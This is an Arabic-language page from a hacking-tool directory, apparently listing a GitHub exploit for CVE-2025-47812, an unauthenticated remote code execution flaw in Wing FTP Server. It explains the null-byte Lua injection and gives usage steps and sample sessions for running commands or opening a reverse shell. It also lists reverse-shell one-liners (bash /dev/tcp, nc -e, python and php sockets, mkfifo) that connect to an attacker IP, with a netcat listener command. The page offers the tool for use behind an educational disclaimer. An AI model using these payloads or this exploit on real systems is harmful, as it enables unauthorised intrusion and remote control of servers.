Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-47812 | Kitploit
أدوات/GitHubGitHub/blindma1den/cve-2025-47812
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرأداة الوصول عن بعد
GitHubblindma1den/cve-2025-47812

CVE-2025-47812

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-47812 - ثغرة تنفيذ التعليمات البرمجية عن بعد (RCE) في خادم Wing FTP Server

===========================================================

المؤلف: blindma1den

التاريخ: يوليو 2025

نوع الاستغلال: تنفيذ التعليمات البرمجية عن بعد (بدون مصادقة)

الهدف: خادم Wing FTP Server الإصدار < 7.4.4

درجة CVSS: 10.0 (حرجة)


الوصف

يستغل هذا السكريبت ثغرة CVE-2025-47812، وهي ثغرة خطيرة في واجهة الويب لخادم Wing FTP Server تسمح للمهاجمين عن بُعد بتنفيذ أوامر نظام عشوائية أو فتح شل عكسي بدون مصادقة.

سبب الثغرة هو التعامل غير السليم مع البايتات الفارغة (%00) في نموذج تسجيل الدخول (/loginok.html). وهذا يسمح بحقن كود Lua في ملفات الجلسة، والتي يتم تقييمها لاحقًا عند الوصول إلى نقاط النهاية مثل /dir.html.


المصادر

وصف NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


الميزات

  • تنفيذ الأوامر (مثل: whoami، uname -a)
  • حمولات متعددة للشل العكسي
  • استخراج كuki جلسة UID تلقائيًا
  • تطبيق Python 3 نظيف وقابل للتوسيع

المتطلبات

  • Python 3.7+
  • وحدة requests

تثبيت التبعيات:

root@kitploit:~
pip install requests

طريقة الاستخدام

شغّل السكريبت:

root@kitploit:~
python3 wingftp_rce_exploit.py

سيُطلب منك إدخال:

  • رابط الهدف (مثل: http://127.0.0.1:5466)
  • اسم المستخدم (الافتراضي: anonymous)
  • وضع الاستغلال: [1] تشغيل أمر [2] تشغيل شل عكسي

أمثلة

[1] تشغيل أمر:

root@kitploit:~
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami

[2] الشل العكسي:

root@kitploit:~
Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444

شغّل المستمع الخاص بك قبل تشغيل الشل:

root@kitploit:~
nc -lvnp 4444

الحمولات المستخدمة (شل عكسي)

Bash: bash -i >& /dev/tcp/IP/PORT 0>&1

Python3: python3 -c 'import socket,subprocess,os; ...'

Netcat: nc IP PORT -e /bin/sh

PHP: php -r '$sock=fsockopen("IP",PORT); ...'

FIFO + Netcat: rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i ...


إخلاء المسؤولية

هذا الكود لأغراض تعليمية فقط. لا تستخدم هذا الاستغلال ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستخدام غير المصرح به غير قانوني وغير أخلاقي.

قم بتحديث أنظمتك فورًا. الإصدار 7.4.4 من Wing FTP Server يعالج هذه الثغرة.

استمتع بالاختراق!

تنزيل الأداة